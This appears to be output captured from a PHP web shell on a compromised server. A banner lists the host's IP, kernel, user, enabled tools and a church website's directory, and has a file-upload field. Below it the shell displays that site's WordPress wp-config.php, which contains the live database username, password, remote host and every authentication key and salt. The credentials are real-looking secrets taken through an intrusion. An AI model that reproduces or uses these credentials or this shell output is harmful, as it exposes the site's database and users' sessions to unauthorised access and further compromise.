| Server IP : 10.200.247.200 / Your IP : 216.73.217.19 Web Server : Apache System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64 User : jeremy ( 1001) PHP Version : 8.4.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/church_sites/lvsaints.com/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'lvsaints_wordpress' );
/** Database username */
define( 'DB_USER', 'lvsaints_w' );
/** Database password */
define( 'DB_PASSWORD', '^O@3o#NDQwHGsnC$770N' );
/** Database hostname */
define( 'DB_HOST', 'db.syndbs.com' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'mQI:e 1++}r9~Z$v r&Pwp7N8G1le!9fEJ.D+}oa/JO>.C7F2BcS_ZI8PrNYzWBf' );
define( 'SECURE_AUTH_KEY', 'f{ELGcE+JghU~-{k%WUvpJw4xns4_Awgb?/6)+4?lM!DGzNqxc.il^%8ff 8KFx=' );
define( 'LOGGED_IN_KEY', '**OBO8^>eo_*Qe;~;3B#^H1!n>M51 T]^XV!n&QE(NboZ`rpT3K@]v~o]QJ5=W]@' );
define( 'NONCE_KEY', 'B_Iy`{gSxNsxy?q,qBT)0=@tQB+Z(|G(PnzAH>r@ZIi:Zq%AJ(J2+lDF]-aZ WbI' );
define( 'AUTH_SALT', '_iB.cU=_lXv(]uLq,)~<ZNBam}C#p:# NFA};|f1]>KcVIZIIWi)]]<px+G+NwfX' );
define( 'SECURE_AUTH_SALT', 'B*nLlUgJ(`R6T=6.>IT]+jx#o}6-vf`6~E(JFY&.lhA!~H]x_o[EvTD)zz#mY,f=' );
define( 'LOGGED_IN_SALT', ':FF@VWXQieW#Z80hlE-G4GQ9+gZ@54]/ahj1Ppeyaz.$G4qwPI9rE3ieO8Rf8DsM' );
define( 'NONCE_SALT', 'N Tl;X!^k+#G,CZ|!J?ecUly{PYFOB&r.G&Fxj$S^&=_O;XVCAw%-hCH#87whE$q' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
define('FS_METHOD','direct');
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';